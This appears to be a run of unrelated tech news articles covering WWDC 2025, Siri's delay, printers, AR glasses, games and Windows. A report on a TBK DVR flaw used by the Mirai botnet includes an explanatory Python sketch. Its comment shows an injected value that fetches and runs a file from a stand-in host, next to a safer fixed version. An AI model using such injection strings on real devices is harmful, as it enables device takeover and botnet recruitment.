Apple's WWDC 2025 did not disappoint, but it didn't inspire either. I wanted answers to some of my burning questions: when is Siri going to glow up? What's the future of Apple Home? And how will Apple inspire consumers to buy into the Vision Pro...er...vision?
None of that was forthcoming. Instead, we got a new, glossy design language (Liquid Glass), a ton of minutiae on iOS 26 feature updates (a camera app overhaul, backgrounds in group messages, edge-to-edge Safari), more intelligent Apple Intelligence, and a much-needed iPadOS reinvention.
Apple spent 90 minutes telling us how the world of iPhones, Macs, Apple Watches, Apple TVs, and iPads would change, but, unlike developer conference keynotes from Google or even Meta, it didn't tell us how it is changing the world. Apple's developer conference was focused squarely on the platforms and how your experience with each of them would change.
No moment stood out as an "Oh, that's gonna change everything."
Not the star you expected
To be clear, there are big changes. iPadOS 26 in particular might be unrecognizable (but in a good way) to people who've been using Apple's tablet for well over a decade. If you'd asked me 48 hours ago what the biggest story to come out of the keynote would be, I would've guessed the new naming convention (years, but not the one you're in!), Liquid Glass (like glass, but much Apple-ly-er), or a surprise. iPadOS 26 was not on my bingo card.
Apple kept the keynote neatly focused on software, which I thought might bode well for a hardware surprise at the end.
I had visions of an Apple AR glasses tease, or the unveiling of a new, tethered, and much more affordable Vision Pro Lite.
In lieu of those fanciful "one more things," I hoped that maybe Apple software engineering lead Craig Federighi would circle back to the dismissive Siri mention at the beginning, preview the fully realized Apple Intelligence Siri, and deliver a blood-oath promise that it would arrive at the same time as the first iOS 26 public betas.
None of that happened. Apple dismissed its challenging year and presented a, to be fair, exhaustive collection of platform updates. At least now we know why Siri is delayed.
To be certain, everything that was unveiled at WWDC 2025 is a lot, and I struggle to wrap my mind around it all. There are bits in there, for instance, like the macOS Tahoe Spotlight update, which won't reveal the true depth of its impact until we test-drive the new platforms.
On that note, I know you're tempted to download all the developer betas, but use caution. They're usually buggy and, in the case of the iPhone, most dev betas tend to suck the life right out of your battery (mainly because they're not yet optimized).
It's about certainty
The larger issue here, though, is that, unlike previous years, when I knew Apple would deliver on its promises, that's no longer a lock. I want to trust that the incredible Vision Pro Personas update, the one that makes those floating heads look absolutely real, will arrive in the fall; that Spotlight with contextual awareness will work as demonstrated on the next new Mac; and that iPadOS 26's windowing and background-activity prowess will be just as powerful as it looked during the keynote.
Even some of the stuff I'm reasonably certain will arrive will be limited. Digital IDs are expanding, but Apple has been unable to get them working in all 50 US states (for now, nine support them), and watchOS 26's Workout Buddy, which relies on Apple Intelligence on the iPhone, will only support English – and may well be US-only at launch.
There are now always limits to Apple's dream scenario, and I find it's smart to wake up from that dream long before the first public beta drops.
Apple may surprise us and overdeliver, but if we've learned one thing from the WWDC 2025 keynote, it's that, for now, it's no longer in the business of big surprises that leave it in a position of underdelivering.
Colorful is reportedly set to release the Smart 900, a new high-end mini PC powered by AMD's top-tier Ryzen AI MAX+ 395 processor.
Until now, Colorful’s AMD-based mini PC offerings have been limited to older processors, such as the Ryzen 7 7735HS used in the Smart 500A.
The Ryzen AI MAX+ 395 in the Smart 900 is AMD's current flagship APU, combining 16 Zen 5 cores with Radeon 8060S graphics, built on 40 RDNA 3.5 Compute Units. This makes it one of the best integrated GPUs available for AI workloads, creative tasks, and gaming.
Memory and AI performance
The system reportedly includes 96GB of LPDDR5X memory, which is lower than the 128GB maximum seen in some high-end PCs.
However, this figure may refer to a dedicated memory allocation for AI inference tasks, sometimes described as “VRAM” in translation.
Whether this is a hard cap or part of a split configuration remains unclear, but it highlights the system’s focus on AI and graphics-intensive use cases.
The Colorful Smart 900 has not yet been officially announced by the company, nor has it appeared on any of its social media channels, so we don't have much more information, such as pricing.
It seems likely, however, that it will be positioned as a mini workstation for professionals working with large media projects.
As of now, only eleven brands have released products featuring Strix Halo, AMD's codename for the Ryzen AI MAX family. Notable models include the HP Z2 Mini G1a, Lenovo LCFC AI PC, and the GMKTec EVO-X2.
What remains puzzling is the complete silence from major brands like Dell, Asus, and MSI, who have yet to introduce any mini PCs using the chip.
These companies already offer high-performance, premium products that far exceed the price points of anything from Colorful or GMKTec, so pricing does not appear to be the limiting factor.
Their hesitation may instead stem from longer internal validation cycles, stricter thermal and reliability standards, or a delay in aligning with AMD's release schedule.
Another possibility is that these companies are prioritizing other AI hardware strategies, such as discrete GPUs or server-grade accelerators, over high-end APUs in compact desktops.
Via Videocardz
If you are using a TBK DVR-4104, DVR-4216, or any digital video recorder that uses these models as its basis, you might want to keep an eye on your hardware, because it's being actively hunted.
Cybersecurity researchers at Kaspersky claim to have seen a year-old vulnerability in these devices being abused to expand the dreaded Mirai botnet.
In April 2024, security researchers found a command injection flaw in the devices listed above. As per the NVD, the flaw is tracked as CVE-2024-3721, and was given a severity score of 6.3/10 (medium). It can be triggered remotely and grants attackers full control over the vulnerable endpoint. Soon after discovery, a proof-of-concept (PoC) exploit for the flaw was also published.
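For readers unfamiliar with the bug class, here's a minimal, hypothetical sketch of how a command injection flaw in a device's web interface typically works. This is an invented illustration, not TBK's firmware code or the published PoC, and the function and parameter names are made up.

```python
# Hypothetical illustration of the command-injection bug class -- NOT
# the actual TBK endpoint or the published PoC. Names are invented.
import subprocess

def ping_host_vulnerable(host: str) -> bytes:
    # BAD: attacker-controlled input is interpolated into a shell command.
    # A value like "8.8.8.8; wget http://evil.example/bot -O /tmp/b; sh /tmp/b"
    # makes the shell execute the attacker's commands as well.
    return subprocess.check_output(f"ping -c 1 {host}", shell=True)

def ping_host_safer(host: str) -> bytes:
    # BETTER: no shell involved, the argument is passed as a single token,
    # and a whitelist check rejects shell metacharacters outright.
    if not all(c.isalnum() or c in ".-:" for c in host):
        raise ValueError("invalid host")
    return subprocess.check_output(["ping", "-c", "1", host])
```

Because flaws like this sit in the request-handling path, a single crafted request can be enough to take over a device, which is exactly what makes them attractive to botnet operators.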
Victims around the world
Now, a year later, Kaspersky says it has seen this same PoC being used to expand the Mirai botnet. The attackers are using the bug to drop ARM32 malware that assimilates the device into the botnet and grants its operators the ability to run distributed denial-of-service (DDoS) attacks, proxy malicious traffic, and more.
The majority of victims Kaspersky is seeing are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. However, Kaspersky is a Russian company whose products are banned in many Western countries, so its analysis could be somewhat skewed.
The number of potentially vulnerable devices was more than 110,000 in 2024, and has since dropped to around 50,000. While most definitely an improvement, it still means that the attack surface is rather large.
Usually, when a vulnerability like this is discovered, a patch soon follows. However, multiple media sources claim it is “unclear” whether maker TBK Vision has patched the bug.
CyberInsider reports that multiple third-party brands base their models on these devices, further complicating patch availability, and states that “it’s very likely that for most, there is no patch.”
Some of the brands are Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, and others.
Via BleepingComputer
Liquid Glass. It's an umbrella term for interface changes across virtually every Apple platform, but it's also evocative of an intangible thing: digital, transparent, amorphous glass that glides, flexes, and responds to touch in a way real glass never could.
Just hours after Apple unveiled, at WWDC 2025, the biggest change to iOS since iOS 7 a dozen years ago, I, along with Tom's Guide Global Editor-in-Chief Mark Spoonauer, sat down with Apple's Senior Vice President of Software Engineering Craig Federighi and Apple Global VP of Marketing Greg Joswiak to talk about everything the company unveiled during its 90-minute keynote.
We talked about Siri, Apple Intelligence, and iPadOS's remarkable transformation, but it was when we asked about the inspiration for Liquid Glass that the pair became most animated.
Federighi first confirmed what rumors have been suggesting for months: that the toddler-aged visionOS, which runs on Apple's $3,500 mixed reality Vision Pro headset, was where it all started.
(Image credit: Lance Ulanoff / Future)
"So I would say the most obvious inspiration is visionOS, which uses glass, and you say, 'Well, why did visionOS use glass?' Well, glass is a material that allows interfaces to sit in the context, in this case, of a room, and feel like the chrome [or frame] – that is, the glass – is somehow consuming kind of less space. It's allowing more of the context to come through. That was very powerful in the concept of visionOS."
I found it hard to believe, though, that this still-new platform could be the full inspiration for Liquid Glass, a design approach that's set to appear in iOS 26, iPadOS 26, macOS Tahoe, tvOS 26, and watchOS 26. I asked Federighi if they looked at visionOS and the lightbulb went off, or if there were other, older influences. It turns out that Apple's obsession with glassy interfaces goes back at least a dozen years.
Through the looking glass
(Image credit: Lance Ulanoff / Future)
"If you look back at even iOS 7, we had started to work with translucent materials, and then you saw, even in macOS Yosemite, the sidebars and windows started to have this kind of translucency," he says. "So there was a glassness, already, that was finding its way as a building block material for interfaces."
Federighi also revealed the extent of real-world testing that went into developing the uncannily realistic look and responsiveness of Liquid Glass. "There [are these] designed rooms. You know, they bring [...] in different pieces of glass with different opacities, different lensing, it's quite interesting."
He added that Apple has an industrial design studio with the capability to fabricate almost anything. "There were certainly real material studies that were being done there."
The efforts to simulate real glass and its optical qualities were extensive, but then Liquid Glass also does things no real glass can do, like changing shape when you touch or move it. But it goes deeper than that.
"We found that because of the incredible diversity of content that you have on your device – you're scrolling through a feed and it's all white and then suddenly there's a dark sky image that comes and scrolls under the glass – but you want the glass to react in a way that a clear piece of light glass would.
Suddenly, the black thing comes in, and you can't read any of your text, or it looks poor. We were able to build adaptive glass that changes the way it's transmitting color that even can flip from a dark glass to a light glass adaptively, by understanding what's behind it. So, you know, it now becomes this incredibly malleable material that always fits in with whatever is beneath it."
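To make the idea concrete, here's a conceptual sketch of that adaptive behavior – my own illustration under simple assumptions, not Apple's implementation. It assumes you can sample the pixels rendered beneath a glass element, and it flips the material's variant based on their average perceived brightness.

```python
# Conceptual sketch of adaptive glass -- an illustration, not Apple's code.
# Assumes `pixels` is a list of (r, g, b) tuples sampled from the content
# currently scrolling beneath the glass element.
def glass_variant(pixels, threshold=0.5):
    def luminance(rgb):
        # Perceived luminance per pixel (Rec. 709 weights), scaled to 0-1.
        r, g, b = (c / 255.0 for c in rgb)
        return 0.2126 * r + 0.7152 * g + 0.0722 * b

    avg = sum(luminance(p) for p in pixels) / len(pixels)
    # Bright content behind the glass -> use the dark variant so text stays
    # legible; dark content -> flip to the light variant.
    return "dark" if avg > threshold else "light"

print(glass_variant([(255, 255, 255), (240, 240, 240)]))  # white feed -> 'dark'
print(glass_variant([(10, 10, 30), (5, 5, 20)]))          # dark sky  -> 'light'
```

The real system would presumably animate between states and weigh the region directly under text most heavily, but the core trick Federighi describes – reacting to what's beneath the glass – reduces to this kind of decision.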
Check back soon for a link to the TechRadar and Tom's Guide podcast featuring the full interview with Federighi and Joswiak.
Epson has introduced a new way for users to access printing, through a subscription model that closely resembles how many people already pay for phones or streaming services.
The new ReadyPrint MAX plan offers customers an EcoTank printer along with regular ink deliveries, starting from as low as the equivalent of $7.99 per month for a 50-page plan.
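To put that headline figure in context, here's a quick back-of-envelope calculation. It uses only the entry-level numbers quoted above; the larger tiers will have their own per-page rates.

```python
# Per-page cost of the entry-level ReadyPrint MAX plan quoted above.
# Only the $7.99 / 50-page figure comes from the announcement.
monthly_fee = 7.99    # USD equivalent per month
pages_included = 50   # pages per month on the entry plan

print(f"${monthly_fee / pages_included:.3f} per page")  # -> $0.160 per page
```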
The model eliminates the need for upfront costs, making it easier to start printing without a large initial purchase.
A constant supply of ink
After selecting a printer that suits their needs, users choose a page plan based on how much they expect to print. The company sends the printer and keeps track of ink levels remotely, delivering new ink before it runs out.
ReadyPrint MAX is compatible with a range of Epson’s EcoTank printers. Models differ in features and price points, covering basic home printing up to higher-volume office use.
Options like the EcoTank ET-2870U and ET-M1170 focus on low-cost printing, while others like the ET-5850U and ET-16650U are aimed at users who need faster speeds, higher capacity, or A3 printouts.
Plans scale with use, offering monthly allowances from 50 to 3,000 pages. Users can change their plan each month if their needs shift, and once the 18-month commitment ends, subscriptions can continue on a monthly basis.
As you might expect, early cancellation fees apply if a user leaves before the minimum period is up, although Epson does offer a 14-day cancellation window at the start.
To keep everything running smoothly, the printer needs to stay connected to the internet, allowing firmware updates and ink tracking.
Ink is delivered proactively, so users don’t need to worry about ordering refills. If a customer chooses to end the plan, the printer must be returned in good condition to avoid a penalty.
ReadyPrint MAX reflects a shift toward service-based models, giving users flexibility in how they access and manage printing at home or in the office. It's currently offered in select European countries, including the UK and Germany, and is expected to launch in the US, which already has the standard ReadyPrint service.
The race to put augmented reality smart glasses on your face is heating up. Snap Spectacles are transforming into "Specs" and will launch as lighter and more powerful AR wearables in 2026.
CEO Evan Spiegel announced the all-new Specs on stage at the XR event AWE, promising smart glasses that are smaller, considerably lighter, and "with a ton more capability."
The company didn't spell out a specific time frame or price, but the 2026 launch schedule does put Meta, which is busy prepping its exciting Orion AR glasses for 2027, on notice. It appears Snap Specs will also face off with the Samsung/Google Android XR-based glasses, which are expected sometime in 2026.
As for what consumers can expect from Specs, Snap is building them on the same Snap OS used in its fifth-generation Spectacles (and likely still using a pair of Qualcomm Snapdragon XR chips). That means all the interface and interaction metaphors, like gesture-based controls, will remain. But there are a significant number of new features and integrations that will start showing up this year, long before Specs arrive, including AI.
Upgrading the platform
(Image credit: Lance Ulanoff / Future)
Spiegel explained the updates by first revealing that Snap started working on glasses "before Snapchat" was even a thing and that the company's overarching goal is "making computers more human." He added that "with advances in AI, computers are thinking and acting like humans more than ever before."
Snap's plan with these updates to Snap OS is to bring AI platforms into the real world. It's bringing Gemini and OpenAI models into Snap OS, which means that some multimodal AI capabilities will soon be part of the fifth-generation Spectacles and, eventually, Specs. These tools might be used for on-the-fly text translation and currency conversion.
The updated platform also adds tools for Snap Lens builders that will integrate with the Spectacles' and Specs' waveguide-based AR display capabilities.
A new Snap3D API, for instance, will let developers use GenAI to create 3D objects in lenses.
The updates will include a Depth Module AI, which can read 2D information to create 3D maps that will help anchor virtual objects in a 3D world.
Businesses deploying Spectacles (and eventually Specs) may appreciate the new Fleet Management app, which will let developers manage and remotely monitor multiple Specs at once, and deploy them for guided navigation at, say, a museum.
Later, Snap OS will add WebXR support to build AR and VR experiences within Web browsers.
Let's make it interesting
Spiegel claimed that, through Lenses in Snapchat, Snap has the largest AR platform in the world. "People use our AR lenses in our camera 8 billion times a day."
That is a lot, but it's virtually all through smartphones. At the moment, only developers are using the bulky Spectacles and their Lenses capabilities.
The consumer release of Specs could change that. When I tried Spectacles last year, I was impressed with the experience and found them full of potential, even if they weren't quite as good as Meta's Orion glasses (the lack of gaze-tracking stood out for me).
A lighter form factor that approaches or surpasses what I found with Orion, and have seen in some Samsung Android XR glasses, could vault Snap Specs into the AR glasses lead. That is, provided they don't cost $2,000.
Developer Round8 Studio has confirmed that Lies of P: Overture will receive additional difficulty changes based on player feedback.
In a new Director's Letter video following the shadow-drop release of the Overture downloadable content (DLC) at Summer Game Fest, director Jiwon Choi thanked players for their feedback and confirmed that the studio is looking to implement some changes that will mainly target combat and difficulty.
"We're reviewing all of it carefully and are already looking into when to implement some of your suggestions," Choi said. "Among all the feedback, we are paying the closest attention to the combat experience."
Players online have shared their thoughts on Overture, with some stating that the DLC feels more difficult than the base game, even when playing on the game's standard difficulty, Legendary Stalker.
"I’m at level 300 and should not be getting two-shot from basic enemies," one player wrote on Steam(via IGN). "It doesn’t help that the enemy grouping is designed for you to have to deal with multiple at once. This wouldn’t be a problem if even one of those enemies doesn’t take out half your health with one hit."
Choi continued, saying that the game will receive adjustments that will essentially nerf the difficulty.
"We identified areas that did not turn out quite as we intended. Therefore, we are reviewing various adjustments, including difficulty reduction.
"However, combat is one of the most fundamental experiences in Lies of P, so any modifications or changes require meticulous work and thorough testing."
We don't know when the patch will arrive, but we'll keep you updated.
In TechRadar Gaming's Lies of P: Overture review, Hardware Editor Rhys Wood said the DLC is an "expansion that exudes confidence on the part of developer Round8 Studio" and "successfully enriches the entire Lies of P package, with stunning and creative level design and some of the best boss fights in the subgenre as a whole".
Google has fixed a flaw that could expose the phone number associated with any Google account, putting people at risk of a range of privacy and security threats.
A security researcher with the alias ‘brutecat’ uncovered a way to bypass the anti-bot protection which prevented people from spamming password reset requests on Google accounts.
This allowed them to cycle through every possible combination until they hit the correct phone number. They later automated the process, allowing a number to be guessed in roughly 20 minutes (depending on how many digits it has).
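A rough back-of-envelope shows why the digit count matters so much. The guess rate below is an assumed figure for illustration, not the researcher's measured number:

```python
# Why brute-force time depends on how many digits are unknown. The
# requests-per-second rate is an assumed illustration, not brutecat's
# actual measured figure.
def worst_case_minutes(unknown_digits: int, requests_per_second: float) -> float:
    candidates = 10 ** unknown_digits          # every possible combination
    return candidates / requests_per_second / 60

# e.g. 8 unknown digits at ~80,000 guesses/sec is roughly 20 minutes
print(f"{worst_case_minutes(8, 80_000):.0f} minutes")   # -> 21 minutes
```

Each known digit cuts the search space by a factor of ten, which is why shorter numbers, or numbers with partially known prefixes, fall so much faster.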
Risks of exposed numbers
There are multiple privacy and security challenges that stem from an exposed phone number. For one, people who rely on anonymity (such as journalists, political opposition, dissidents, and similar) could be more vulnerable to targeted attacks. Also, exposing a person’s phone number opens them up to SIM-swap attacks, as well as phishing and social engineering. Finally, if an attacker successfully hijacks a phone number, they could reset passwords and gain unauthorized access to linked accounts.
Luckily enough, the issue has been fixed, and so far there have been no reports of the flaw being abused in the wild.
TechCrunch was one of the publications confirming the authenticity of the flaw, after setting up a dummy account with a brand new phone number, and having it “cracked” soon after.
“This issue has been fixed. We’ve always stressed the importance of working with the security research community through our vulnerability rewards program and we want to thank the researcher for flagging this issue,” Google spokesperson Kimberly Samra told TechCrunch.
“Researcher submissions like this are one of the many ways we’re able to quickly find and fix issues for the safety of our users.”
Samra said that the company has seen “no confirmed, direct links to exploits at this time.”
There's no denying that Apple's Siri digital assistant didn't exactly hold a place of honor at this year's WWDC 2025 keynote. Apple mentioned it, and reiterated that it was taking longer than it had anticipated to bring everyone the Siri it promised a year ago, saying the full Apple Intelligence Siri would arrive "in the coming year."
Apple has since confirmed this means 2026. That means we won't be seeing the kind of deep integration that would have let Siri use what it knew about you and your iOS-running iPhone to become a better digital companion in 2025. It won't, as part of the just-announced iOS 26, use app intents to understand what's happening on the screen and take action on your behalf based on that.
I have my theories about the reason for the delay, most of which revolve around the tension between delivering a rich AI experience and Apple's core principles regarding privacy. They often seem at cross purposes. This, though, is guesswork. Only Apple can tell us exactly what's going on – and now they have.
I, along with Tom's Guide Global Editor-in-Chief Mark Spoonauer, sat down shortly after the keynote with Apple's Senior Vice President of Software Engineering Craig Federighi and Apple Global VP of Marketing Greg Joswiak for a wide-ranging podcast discussion about virtually everything Apple unveiled during its 90-minute keynote.
We started by asking Federighi about what Apple delivered regarding Apple Intelligence, as well as the status of Siri, and what iPhone users might expect this year or next. Federighi was surprisingly transparent, offering a window into Apple's strategic thinking when it comes to Apple Intelligence, Siri, and AI.
Far from nothing
Left to right: Lance Ulanoff and Mark Spoonauer chat with Craig Federighi and Greg Joswiak (Image credit: Apple)
Federighi started by walking us through all that Apple has delivered with Apple Intelligence thus far, and, to be fair, it's a considerable amount.
"We were very focused on creating a broad platform for really integrated personal experiences into the OS." recalled Federighi, referring to the original Apple Intelligence announcement at WWDC 2024.
At the time, Apple demonstrated Writing Tools, summarizations, notifications, movie memories, semantic search of the Photos library, and Clean Up for photos. It delivered on all those features, but even as Apple was building those tools, it recognized, Federighi told us, that "we could, on that foundation of large language models on device, private cloud compute as a foundation for even more intelligence, [and] semantic indexing on device to retrieve personal knowledge, build a better Siri."
Over-confidence?
A year ago, Apple's confidence in its ability to build such a Siri led it to demonstrate a platform that could handle more conversational context, misspeaking, Type to Siri, and a significantly redesigned UI. Again, all things Apple delivered.
"We also talked about [...] things like being able to invoke a broader range of actions across your device by app intents being orchestrated by Siri to let it do more things," added Federighi. "We also talked about the ability to use personal knowledge from that semantic index so if you ask for things like, "What's that podcast, that 'Joz' sent me?' that we could find it, whether it was in your messages or in your email, and call it out, and then maybe even act on it using those app intents. That piece is the piece that we have not delivered, yet."
This is known history. Apple overpromised and underdelivered, failing to deliver a vaguely promised end-of-year Apple Intelligence Siri update in 2024 and admitting by spring 2025 that it would not be ready any time soon. As to why it happened, it's been, up to now, a bit of a mystery. Apple is not in the habit of demonstrating technology or products that it does not know for certain that it will be able to deliver on schedule.
Federighi, however, explained in some detail where things went awry, and how Apple progresses from here.
"We found that when we were developing this feature that we had, really, two phases, two versions of the ultimate architecture that we were going to create," he explained. "Version one we had working here at the time that we were getting close to the conference, and had, at the time, high confidence that we could deliver it. We thought by December, and if not, we figured by spring, until we announced it as part of WWDC. Because we knew the world wanted a really complete picture of, 'What's Apple thinking about the implications of Apple intelligence and where is it going?'"
A tale of two architectures
(Image credit: Apple)
As Apple was working on a V1 of the Siri architecture, it was also working on what Federighi called V2, "a deeper end-to-end architecture that we knew was ultimately what we wanted to create, to get to a full set of capabilities that we wanted for Siri."
What everyone saw during WWDC 2024 were videos of that V1 architecture, and that was the foundation for work that began in earnest after the WWDC 2024 reveal, in preparation for the full Apple Intelligence Siri launch.
"We set about for months, making it work better and better across more app intents, better and better for doing search," Federighi added. "But fundamentally, we found that the limitations of the V1 architecture weren't getting us to the quality level that we knew our customers needed and expected. We realized that V1 architecture, you know, we could push and push and push and put in more time, but if we tried to push that out in the state it was going to be in, it would not meet our customer expectations or Apple standards, and that we had to move to the V2 architecture.
"As soon as we realized that, and that was during the spring, we let the world know that we weren't going to be able to put that out, and we were going to keep working on really shifting to the new architecture and releasing something."
That switch, though, and what Apple learned along the way, meant that Apple would not make the same mistake again and promise a new Siri for a date it could not guarantee to hit. Instead, Apple won't "precommunicate a date," explained Federighi, "until we have, in-house, the V2 architecture delivering not just in a form that we can demonstrate for you all…"
He then joked that, while, actually, he "could" demonstrate a working V2 model, he was not going to do it. Then he added, more seriously, "We have, you know, the V2 architecture, of course, working in-house, but we're not yet to the point where it's delivering at the quality level that I think makes it a great Apple feature, and so we're not announcing the date for when that's happening. We will announce the date when we're ready to seed it, and you're all ready to be able to experience it."
I asked Federighi if, by V2 architecture, he was talking about a wholesale rebuilding of Siri, but Federighi disabused me of that notion.
"I should say the V2 architecture is not, it wasn't a star-over. The V1 architecture was sort of half of the V2 architecture, and now we extend it across, sort of make it a pure architecture that extends across the entire Siri experience. So we've been very much building up upon what we have been building for V1, but now extending it more completely, and that more homogeneous end-to-end architecture gives us much higher quality and much better capability. And so that's what we're building now."
A different AI strategy
(Image credit: Apple)
Some might view Apple's failure to deliver the full Siri on its original schedule as a strategic stumble. But Apple's approach to AI and product is utterly different from that of OpenAI or Google. It does not revolve around a singular product or a powerful chatbot. Siri is not necessarily the centerpiece we all imagined.
Federighi doesn't dispute that "AI is this transformational technology […] All that's growing out of this architecture is going to have decades-long impact across the industry and the economy, and much like the internet, much like mobility, and it's going to touch Apple's products and it's going to touch experiences that are well outside of Apple products."
Apple clearly wants to be part of this revolution, but on its terms and in ways that most benefit its users while, of course, protecting their privacy. Siri, though, was never the end game, as Federighi explained.
"When we started with Apple Intelligence, we were very clear: this wasn't about just building a chatbot. So, seemingly, when some of these Siri capabilities I mentioned didn't show up, people were like, 'What happened, Apple? I thought you were going to give us your chatbot. That was never the goal, and it remains not our primary goal."
So what is the goal? I think it may be fairly obvious from the WWDC 2025 keynote. Apple is intent on integrating Apple Intelligence across all its platforms. Instead of heading over to a singular app like ChatGPT for your AI needs, Apple's putting it, in a way, everywhere. It's done, Federighi explains, "in a way that meets you where you are, not that you're going off to some chat experience in order to get things done."
Apple understands the allure of conversational bots. "I know a lot of people find it to be a really powerful way to gather their thoughts, brainstorm [...] So, sure, these are great things," Federighi says. "Are they the most important thing for Apple to develop? Well, time will tell where we go there, but that's not the main thing we set out to do at this time."
Check back soon for a link to the TechRadar and Tom's Guide podcast featuring the full interview with Federighi and Joswiak.
Microsoft is bringing a handful of changes to its Windows 11 operating system in preparation for the ROG Xbox Ally handhelds. Beta testers are already starting to see improvements to the user interface – and one feature may be a significant aid to navigation.
As reported by The Verge, Microsoft is improving its Windows 11 Start menu, now available for testers, with more customization options to make scrolling and finding applications easier. These can be sorted into separate categories (as evident in the image below) or used in the classic grid view.
While all applications have always been accessible via the Start menu, this improved version makes finding a given application much easier. Instead of tracking down a specific app by its first letter or symbol, you'll simply be able to jump into a 'Games' or 'Browsers' category, eliminating the need to enable desktop icons.
The 'recommended' section, which often displays recently opened files or folders, can also be disabled to make room for more apps and the new categories. It's also worth noting that Microsoft says the Start menu will be bigger, with its exact size varying depending on the screen and device being used.
These changes line up nicely with the new login screen that lets users enter their PIN with a game controller – likely preparation for the "full-screen experience" update coming to the new Windows 11 handhelds. However, there's one big benefit that OLED monitor users like me will appreciate, too.
Analysis: Some of my OLED burn-in worries can rest...
(Image credit: Microsoft)
I'll be honest: in all the years I've used Dell's Alienware AW3423DWF OLED monitor, I haven't come across a single issue with burn-in – and that includes moments of complacency, leaving static images on screen. Even so, I'm still paranoid it will happen eventually, and Microsoft's efforts toward a better Start menu give me a slight sigh of relief.
Burn-in is one of the biggest dealbreakers for gamers contemplating an OLED purchase, and it's why I would go as far as to recommend a mini-LED monitor in some cases. However, OLED care on monitors is continuously advancing, and while Microsoft may have had other intentions with this tester update, it's worked as a bonus.
While Microsoft is doing this with its OS, I'd love to see the same concept applied to games. Early access or multiplayer games often have a build number in the corner of the screen, and fellow OLED users will be aware of how much of a nightmare this is, as it's essentially an open invitation for burn-in.
Regardless, it's a positive move from Microsoft in the same week that it announced an improved Xbox app. We'll just have to see if it's enough to create strong competition for SteamOS in terms of usability.